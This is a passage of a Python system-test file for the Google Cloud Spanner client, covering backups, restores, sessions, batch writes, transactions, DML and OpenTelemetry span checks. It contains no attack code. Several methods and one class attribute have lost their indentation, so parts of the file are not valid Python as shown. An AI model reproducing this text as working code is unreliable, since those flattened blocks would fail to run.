        op1.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)  # raises on failure / timeout.
        op2.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)  # raises on failure / timeout.
        # Timestamp used as the backups' version_time in the tests below.
        cls.database_version_time = datetime.utcnow().replace(tzinfo=UTC)
        current_config = Config.INSTANCE.configuration_name
        same_config_instance_id = "same-config" + unique_resource_id("-")
        create_time = str(int(time.time()))
        labels = {"python-spanner-systests": "true", "created": create_time}
        cls._same_config_instance = Config.CLIENT.instance(
            same_config_instance_id, current_config, labels=labels
        )
        op = cls._same_config_instance.create()
        op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
        cls._instances = [cls._same_config_instance]
        retry = RetryErrors(exceptions.ServiceUnavailable)
        configs = list(retry(Config.CLIENT.list_instance_configs)())
        diff_configs = [
            config.name
            for config in configs
            # BUGFIX: compare by value. ``is not`` tests object identity and
            # is effectively always True for distinct string objects, which
            # could select the *current* config as a "different" one.
            if "-us-" in config.name and config.name != current_config
        ]
        cls._diff_config_instance = None
        if len(diff_configs) > 0:
            diff_config_instance_id = "diff-config" + unique_resource_id("-")
            create_time = str(int(time.time()))
            labels = {"python-spanner-systests": "true", "created": create_time}
            cls._diff_config_instance = Config.CLIENT.instance(
                diff_config_instance_id, diff_configs[0], labels=labels
            )
            op = cls._diff_config_instance.create()
            op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
            cls._instances.append(cls._diff_config_instance)

    @classmethod
    def tearDownClass(cls):
        # Drop databases before deleting the instances that host them.
        for db in cls._dbs:
            db.drop()
        for instance in cls._instances:
            instance.delete()

    def setUp(self):
        # Per-test cleanup registries: backups to delete, databases to drop.
        self.to_delete = []
        self.to_drop = []

    def tearDown(self):
        for doomed in self.to_delete:
            doomed.delete()
        for doomed in self.to_drop:
            doomed.drop()

    def test_create_invalid(self):
        """A backup whose expire_time is already in the past is rejected."""
        from datetime import datetime
        from pytz import UTC

        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow()
        expire_time = expire_time.replace(tzinfo=UTC)
        backup = Config.INSTANCE.backup(
            backup_id, database=self._db, expire_time=expire_time
        )
        with self.assertRaises(exceptions.InvalidArgument):
            op = backup.create()
            op.result()

    def test_backup_workflow(self):
        """End-to-end: create an encrypted backup, verify its metadata,
        update its expire time, restore it, and delete it."""
        from google.cloud.spanner_admin_database_v1 import (
            CreateBackupEncryptionConfig,
            EncryptionConfig,
            EncryptionInfo,
            RestoreDatabaseEncryptionConfig,
        )
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        instance = Config.INSTANCE
        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        encryption_config = CreateBackupEncryptionConfig(
            encryption_type=CreateBackupEncryptionConfig.EncryptionType.GOOGLE_DEFAULT_ENCRYPTION,
        )
        # Create backup.
        backup = instance.backup(
            backup_id,
            database=self._db,
            expire_time=expire_time,
            version_time=self.database_version_time,
            encryption_config=encryption_config,
        )
        operation = backup.create()
        self.to_delete.append(backup)
        # Check metadata.
        metadata = operation.metadata
        self.assertEqual(backup.name, metadata.name)
        self.assertEqual(self._db.name, metadata.database)
        operation.result()
        # Check backup object.
        backup.reload()
        self.assertEqual(self._db.name, backup._database)
        self.assertEqual(expire_time, backup.expire_time)
        self.assertIsNotNone(backup.create_time)
        self.assertEqual(self.database_version_time, backup.version_time)
        self.assertIsNotNone(backup.size_bytes)
        self.assertIsNotNone(backup.state)
        self.assertEqual(
            EncryptionInfo.Type.GOOGLE_DEFAULT_ENCRYPTION,
            backup.encryption_info.encryption_type,
        )
        # Update with valid argument.
        valid_expire_time = datetime.utcnow() + timedelta(days=7)
        valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
        backup.update_expire_time(valid_expire_time)
        self.assertEqual(valid_expire_time, backup.expire_time)
        # Restore database to same instance.
        restored_id = "restored_db" + unique_resource_id("_")
        encryption_config = RestoreDatabaseEncryptionConfig(
            encryption_type=RestoreDatabaseEncryptionConfig.EncryptionType.GOOGLE_DEFAULT_ENCRYPTION,
        )
        database = instance.database(restored_id, encryption_config=encryption_config)
        self.to_drop.append(database)
        operation = database.restore(source=backup)
        restored_db = operation.result()
        self.assertEqual(
            self.database_version_time,
            restored_db.restore_info.backup_info.version_time,
        )
        metadata = operation.metadata
        self.assertEqual(self.database_version_time, metadata.backup_info.version_time)
        database.reload()
        expected_encryption_config = EncryptionConfig()
        self.assertEqual(expected_encryption_config, database.encryption_config)
        database.drop()
        backup.delete()
        self.assertFalse(backup.exists())

    def test_backup_version_time_defaults_to_create_time(self):
        """When version_time is omitted, it defaults to the create time."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        instance = Config.INSTANCE
        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        # Create backup.
        backup = instance.backup(backup_id, database=self._db, expire_time=expire_time,)
        operation = backup.create()
        self.to_delete.append(backup)
        # Check metadata.
        metadata = operation.metadata
        self.assertEqual(backup.name, metadata.name)
        self.assertEqual(self._db.name, metadata.database)
        operation.result()
        # Check backup object.
        backup.reload()
        self.assertEqual(self._db.name, backup._database)
        self.assertIsNotNone(backup.create_time)
        self.assertEqual(backup.create_time, backup.version_time)
        backup.delete()
        self.assertFalse(backup.exists())

    def test_create_backup_invalid_version_time_past(self):
        """A version_time before the earliest version time is rejected."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        version_time = datetime.utcnow() - timedelta(days=10)
        version_time = version_time.replace(tzinfo=UTC)
        backup = Config.INSTANCE.backup(
            backup_id,
            database=self._db,
            expire_time=expire_time,
            version_time=version_time,
        )
        with self.assertRaises(exceptions.InvalidArgument):
            op = backup.create()
            op.result()

    def test_create_backup_invalid_version_time_future(self):
        """A version_time in the future is rejected."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        version_time = datetime.utcnow() + timedelta(days=2)
        version_time = version_time.replace(tzinfo=UTC)
        backup = Config.INSTANCE.backup(
            backup_id,
            database=self._db,
            expire_time=expire_time,
            version_time=version_time,
        )
        with self.assertRaises(exceptions.InvalidArgument):
            op = backup.create()
            op.result()

    def test_restore_to_diff_instance(self):
        """A backup can be restored to another instance with the same config."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        backup_id = "backup_id" + unique_resource_id("_")
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        # Create backup.
        backup = Config.INSTANCE.backup(
            backup_id, database=self._db, expire_time=expire_time
        )
        op = backup.create()
        self.to_delete.append(backup)
        op.result()
        # Restore database to different instance with same config.
        restored_id = "restored_db" + unique_resource_id("_")
        database = self._same_config_instance.database(restored_id)
        self.to_drop.append(database)
        operation = database.restore(source=backup)
        operation.result()
        database.drop()
        backup.delete()
        self.assertFalse(backup.exists())

    def test_multi_create_cancel_update_error_restore_errors(self):
        """Exercise concurrent backup creation, cancellation, invalid
        expire-time updates, and the restore error paths."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        backup_id_1 = "backup_id1" + unique_resource_id("_")
        backup_id_2 = "backup_id2" + unique_resource_id("_")
        instance = Config.INSTANCE
        expire_time = datetime.utcnow() + timedelta(days=3)
        expire_time = expire_time.replace(tzinfo=UTC)
        backup1 = instance.backup(
            backup_id_1, database=self._dbs[0], expire_time=expire_time
        )
        backup2 = instance.backup(
            backup_id_2, database=self._dbs[1], expire_time=expire_time
        )
        # Create two backups.
        op1 = backup1.create()
        op2 = backup2.create()
        self.to_delete.extend([backup1, backup2])
        backup1.reload()
        self.assertFalse(backup1.is_ready())
        backup2.reload()
        self.assertFalse(backup2.is_ready())
        # Cancel a create operation.
        op2.cancel()
        self.assertTrue(op2.cancelled())
        op1.result()
        backup1.reload()
        self.assertTrue(backup1.is_ready())
        # Update expire time to invalid value.
        invalid_expire_time = datetime.now() + timedelta(days=366)
        invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
        with self.assertRaises(exceptions.InvalidArgument):
            backup1.update_expire_time(invalid_expire_time)
        # Restore to existing database.
        with self.assertRaises(exceptions.AlreadyExists):
            self._db.restore(source=backup1)
        # Restore to instance with different config.
        # BUGFIX: the guard was inverted (``is not None: return``), which
        # skipped the cross-config assertions whenever a diff-config instance
        # existed and dereferenced None when it did not.
        if self._diff_config_instance is None:
            return
        new_db = self._diff_config_instance.database("diff_config")
        op = new_db.create()
        op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
        self.to_drop.append(new_db)
        with self.assertRaises(exceptions.InvalidArgument):
            new_db.restore(source=backup1)

    def test_list_backups(self):
        """list_backups() honors each documented filter and pagination."""
        from datetime import datetime
        from datetime import timedelta
        from pytz import UTC

        backup_id_1 = "backup_id1" + unique_resource_id("_")
        backup_id_2 = "backup_id2" + unique_resource_id("_")
        instance = Config.INSTANCE
        expire_time_1 = datetime.utcnow() + timedelta(days=21)
        expire_time_1 = expire_time_1.replace(tzinfo=UTC)
        backup1 = Config.INSTANCE.backup(
            backup_id_1,
            database=self._dbs[0],
            expire_time=expire_time_1,
            version_time=self.database_version_time,
        )
        expire_time_2 = datetime.utcnow() + timedelta(days=1)
        expire_time_2 = expire_time_2.replace(tzinfo=UTC)
        backup2 = Config.INSTANCE.backup(
            backup_id_2, database=self._dbs[1], expire_time=expire_time_2
        )
        # Create two backups: backup1 completes, backup2 stays CREATING while
        # the state filter below runs.
        op1 = backup1.create()
        op1.result()
        backup1.reload()
        create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
        backup2.create()
        self.to_delete.extend([backup1, backup2])
        # List backups filtered by state.
        filter_ = "state:CREATING"
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup2.name)
        # List backups filtered by backup name.
        filter_ = "name:{0}".format(backup_id_1)
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup1.name)
        # List backups filtered by database name.
        filter_ = "database:{0}".format(self._dbs[0].name)
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup1.name)
        # List backups filtered by create time.
        filter_ = 'create_time > "{0}"'.format(
            create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        )
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup2.name)
        # List backups filtered by version time.
        filter_ = 'version_time > "{0}"'.format(
            create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        )
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup2.name)
        # List backups filtered by expire time.
        filter_ = 'expire_time > "{0}"'.format(
            expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
        )
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup1.name)
        # List backups filtered by size bytes.
        filter_ = "size_bytes < {0}".format(backup1.size_bytes)
        for backup in instance.list_backups(filter_=filter_):
            self.assertEqual(backup.name, backup2.name)
        # List backups using pagination.
        count = 0
        for page in instance.list_backups(page_size=1):
            count += 1
        self.assertEqual(count, 2)
# Sample values covering the scalar Spanner types exercised by the
# ``all_types`` table fixtures below.
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
# A NaN with a non-default bit pattern, to exercise NaN round-tripping.
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
    "pkey",
    "int_value",
    "int_array",
    "bool_value",
    "bool_array",
    "bytes_value",
    "bytes_array",
    "date_value",
    "date_array",
    "float_value",
    "float_array",
    "string_value",
    "string_array",
    "timestamp_value",
    "timestamp_array",
    "numeric_value",
    "numeric_array",
)
# The emulator does not support NUMERIC; drop the trailing numeric columns.
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
# Row factories whose fields all default to None (SQL NULL), so fixtures can
# set just the columns they care about.
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = (None,) * len(ALL_TYPES_COLUMNS)
EmulatorAllTypesRowData = collections.namedtuple(
    "EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = (None,) * len(
    EMULATOR_ALL_TYPES_COLUMNS
)
# Fixture rows for the ``all_types`` table: one all-NULL row, one row per
# non-null scalar column, one per empty-array column, and one per array
# column holding values plus a trailing NULL element.
ALL_TYPES_ROWDATA = (
    # all nulls
    AllTypesRowData(pkey=0),
    # Non-null values
    AllTypesRowData(pkey=101, int_value=123),
    AllTypesRowData(pkey=102, bool_value=False),
    AllTypesRowData(pkey=103, bytes_value=BYTES_1),
    AllTypesRowData(pkey=104, date_value=SOME_DATE),
    AllTypesRowData(pkey=105, float_value=1.4142136),
    AllTypesRowData(pkey=106, string_value=u"VALUE"),
    AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
    AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
    AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
    # empty array values
    AllTypesRowData(pkey=201, int_array=[]),
    AllTypesRowData(pkey=202, bool_array=[]),
    AllTypesRowData(pkey=203, bytes_array=[]),
    AllTypesRowData(pkey=204, date_array=[]),
    AllTypesRowData(pkey=205, float_array=[]),
    AllTypesRowData(pkey=206, string_array=[]),
    AllTypesRowData(pkey=207, timestamp_array=[]),
    AllTypesRowData(pkey=208, numeric_array=[]),
    # non-empty array values, including nulls
    AllTypesRowData(pkey=301, int_array=[123, 456, None]),
    AllTypesRowData(pkey=302, bool_array=[True, False, None]),
    AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
    AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
    AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
    AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
    AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
    AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
# Same fixture matrix minus the NUMERIC rows, for the emulator.
EMULATOR_ALL_TYPES_ROWDATA = (
    # all nulls
    EmulatorAllTypesRowData(pkey=0),
    # Non-null values
    EmulatorAllTypesRowData(pkey=101, int_value=123),
    EmulatorAllTypesRowData(pkey=102, bool_value=False),
    EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
    EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
    EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
    EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
    EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
    EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
    # empty array values
    EmulatorAllTypesRowData(pkey=201, int_array=[]),
    EmulatorAllTypesRowData(pkey=202, bool_array=[]),
    EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
    EmulatorAllTypesRowData(pkey=204, date_array=[]),
    EmulatorAllTypesRowData(pkey=205, float_array=[]),
    EmulatorAllTypesRowData(pkey=206, string_array=[]),
    EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
    # non-empty array values, including nulls
    EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
    EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
    EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
    EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
    EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
    EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
    EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
    @classmethod
    def setUpClass(cls):
        """Provision the shared test database once for the whole class."""
        # Call SetUpClass from parent (OpenTelemetryBase)
        super(TestSessionAPI, cls).setUpClass()
        pool = BurstyPool(labels={"testcase": "session_api"})
        ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
        cls._db = Config.INSTANCE.database(
            cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
        )
        operation = cls._db.create()
        operation.result(
            SPANNER_OPERATION_TIMEOUT_IN_SECONDS
        )  # raises on failure / timeout.
    @classmethod
    def tearDownClass(cls):
        # Drop the class-wide database created in setUpClass.
        cls._db.drop()
    def setUp(self):
        super(TestSessionAPI, self).setUp()
        # Resources registered here are deleted in tearDown.
        self.to_delete = []
    def tearDown(self):
        super(TestSessionAPI, self).tearDown()
        # Delete sessions and other resources created during the test.
        for doomed in self.to_delete:
            doomed.delete()
        if HAS_OPENTELEMETRY_INSTALLED:
            self.ot_exporter.clear()  # Clear any ot spans from above step.
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
    def test_batch_insert_then_read(self):
        """Batch-insert rows, read them back via a timestamp-bound snapshot,
        and — when OpenTelemetry is installed — verify the exact ordered
        sequence of spans: GetSession, Commit, GetSession, ReadOnlyTransaction."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        with self._db.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
            batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
        with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows)
        if HAS_OPENTELEMETRY_INSTALLED:
            span_list = self.ot_exporter.get_finished_spans()
            self.assertEqual(len(span_list), 4)
            self.assertSpanAttributes(
                "CloudSpanner.GetSession",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{"db.instance": self._db.name, "session_found": True}
                ),
                span=span_list[0],
            )
            self.assertSpanAttributes(
                "CloudSpanner.Commit",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    # Two mutations: the delete plus the insert.
                    **{"db.instance": self._db.name, "num_mutations": 2}
                ),
                span=span_list[1],
            )
            self.assertSpanAttributes(
                "CloudSpanner.GetSession",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{"db.instance": self._db.name, "session_found": True}
                ),
                span=span_list[2],
            )
            self.assertSpanAttributes(
                "CloudSpanner.ReadOnlyTransaction",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{
                        "db.instance": self._db.name,
                        "columns": self.COLUMNS,
                        "table_id": self.TABLE,
                    }
                ),
                span=span_list[3],
            )
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
    def test_batch_insert_then_read_all_datatypes(self):
        """Round-trip the full matrix of scalar and array column types."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        # The emulator lacks NUMERIC support, so use the reduced fixtures.
        if USE_EMULATOR:
            all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
            all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
        else:
            all_types_columns = ALL_TYPES_COLUMNS
            all_types_rowdata = ALL_TYPES_ROWDATA
        with self._db.batch() as batch:
            batch.delete(ALL_TYPES_TABLE, self.ALL)
            batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
        with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
            rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
        self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
    def test_batch_insert_w_commit_timestamp(self):
        """A COMMIT_TIMESTAMP placeholder column is replaced server-side by
        the batch's actual commit timestamp."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        table = "users_history"
        columns = ["id", "commit_ts", "name", "email", "deleted"]
        user_id = 1234
        name = "phred"
        email = "phred@example.com"
        row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
        with self._db.batch() as batch:
            batch.delete(table, self.ALL)
            batch.insert(table, columns, row_data)
        with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
            rows = list(snapshot.read(table, columns, self.ALL))
        self.assertEqual(len(rows), 1)
        r_id, commit_ts, r_name, r_email, deleted = rows[0]
        self.assertEqual(r_id, user_id)
        # The sentinel must have been replaced by the actual commit timestamp.
        self.assertEqual(commit_ts, batch.committed)
        self.assertEqual(r_name, name)
        self.assertEqual(r_email, email)
        self.assertFalse(deleted)
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Aborted)
    def test_transaction_read_and_insert_then_rollback(self):
        """Writes buffered in an explicit transaction are invisible to reads
        within the transaction and are discarded by rollback(); when
        OpenTelemetry is installed, the 8 expected spans are verified in
        order: CreateSession, GetSession, Commit, BeginTransaction, three
        ReadOnlyTransaction spans, and Rollback."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with self._db.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        transaction = session.transaction()
        transaction.begin()
        rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(rows, [])
        transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
        # Inserted rows can't be read until after commit.
        rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(rows, [])
        transaction.rollback()
        # After rollback, the table must still be empty.
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(rows, [])
        if HAS_OPENTELEMETRY_INSTALLED:
            span_list = self.ot_exporter.get_finished_spans()
            self.assertEqual(len(span_list), 8)
            self.assertSpanAttributes(
                "CloudSpanner.CreateSession",
                attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
                span=span_list[0],
            )
            self.assertSpanAttributes(
                "CloudSpanner.GetSession",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{"db.instance": self._db.name, "session_found": True}
                ),
                span=span_list[1],
            )
            self.assertSpanAttributes(
                "CloudSpanner.Commit",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    # One mutation: the batch delete.
                    **{"db.instance": self._db.name, "num_mutations": 1}
                ),
                span=span_list[2],
            )
            self.assertSpanAttributes(
                "CloudSpanner.BeginTransaction",
                attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
                span=span_list[3],
            )
            self.assertSpanAttributes(
                "CloudSpanner.ReadOnlyTransaction",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{
                        "db.instance": self._db.name,
                        "table_id": self.TABLE,
                        "columns": self.COLUMNS,
                    }
                ),
                span=span_list[4],
            )
            self.assertSpanAttributes(
                "CloudSpanner.ReadOnlyTransaction",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{
                        "db.instance": self._db.name,
                        "table_id": self.TABLE,
                        "columns": self.COLUMNS,
                    }
                ),
                span=span_list[5],
            )
            self.assertSpanAttributes(
                "CloudSpanner.Rollback",
                attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
                span=span_list[6],
            )
            self.assertSpanAttributes(
                "CloudSpanner.ReadOnlyTransaction",
                attributes=dict(
                    BASE_ATTRIBUTES,
                    **{
                        "db.instance": self._db.name,
                        "table_id": self.TABLE,
                        "columns": self.COLUMNS,
                    }
                ),
                span=span_list[7],
            )
    def _transaction_read_then_raise(self, transaction):
        """Unit of work that buffers inserts and then aborts by raising
        CustomException, so callers can assert the rollback behavior."""
        rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(len(rows), 0)
        transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
        raise CustomException()
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Conflict)
    def test_transaction_read_and_insert_then_exception(self):
        """An exception raised inside run_in_transaction() propagates and
        rolls back any buffered writes."""
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        with self._db.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        with self.assertRaises(CustomException):
            self._db.run_in_transaction(self._transaction_read_then_raise)
        # Transaction was rolled back.
        with self._db.snapshot() as snapshot:
            rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(rows, [])
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Conflict)
    def test_transaction_read_and_insert_or_update_then_commit(self):
        """Mutations staged via insert_or_update are invisible until commit."""
        # [START spanner_test_dml_read_your_writes]
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        with session.transaction() as transaction:
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
            # Inserted rows can't be read until after commit.
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
        # Leaving the ``with`` block commits; the rows are now visible.
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows)
        # [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Conflict)
    def test_transaction_execute_sql_w_dml_read_rollback(self):
        """Rows inserted via DML are readable pre-commit but gone after rollback."""
        # [START spanner_test_dml_rollback_txn_not_committed]
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        # Begin the transaction explicitly so it can be rolled back by hand.
        transaction = session.transaction()
        transaction.begin()
        rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
        self.assertEqual(rows, [])
        for insert_statement in self._generate_insert_statements():
            result = transaction.execute_sql(insert_statement)
            list(result)  # iterate to get stats
            self.assertEqual(result.stats.row_count_exact, 1)
        # Rows inserted via DML *can* be read before commit.
        during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(during_rows)
        transaction.rollback()
        # After rollback nothing was persisted.
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows, [])
        # [END spanner_test_dml_rollback_txn_not_committed]
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Conflict)
    def test_transaction_execute_update_read_commit(self):
        """execute_update reports exact row counts; DML rows visible pre-commit."""
        # [START spanner_test_dml_read_your_writes]
        retry = RetryInstanceState(_has_all_ddl)
        retry(self._db.reload)()
        session = self._db.session()
        session.create()
        self.to_delete.append(session)
        with session.batch() as batch:
            batch.delete(self.TABLE, self.ALL)
        with session.transaction() as transaction:
            rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self.assertEqual(rows, [])
            for insert_statement in self._generate_insert_statements():
                row_count = transaction.execute_update(insert_statement)
                self.assertEqual(row_count, 1)
            # Rows inserted via DML *can* be read before commit.
            during_rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
            self._check_rows_data(during_rows)
        # The ``with`` block committed; the inserts are now durable.
        rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
        self._check_rows_data(rows)
        # [END spanner_test_dml_read_your_writes]
    @RetryErrors(exception=exceptions.ServerError)
    @RetryErrors(exception=exceptions.Conflict)
    def test_transaction_execute_update_then_insert_commit(self):
        """A DML insert and a mutation insert can commit in one transaction."""
        # [START spanner_test_dml_with_mutation]
        # [START spanner_test_dml_update]
        retry = RetryInstanceState(_has_all_ddl)
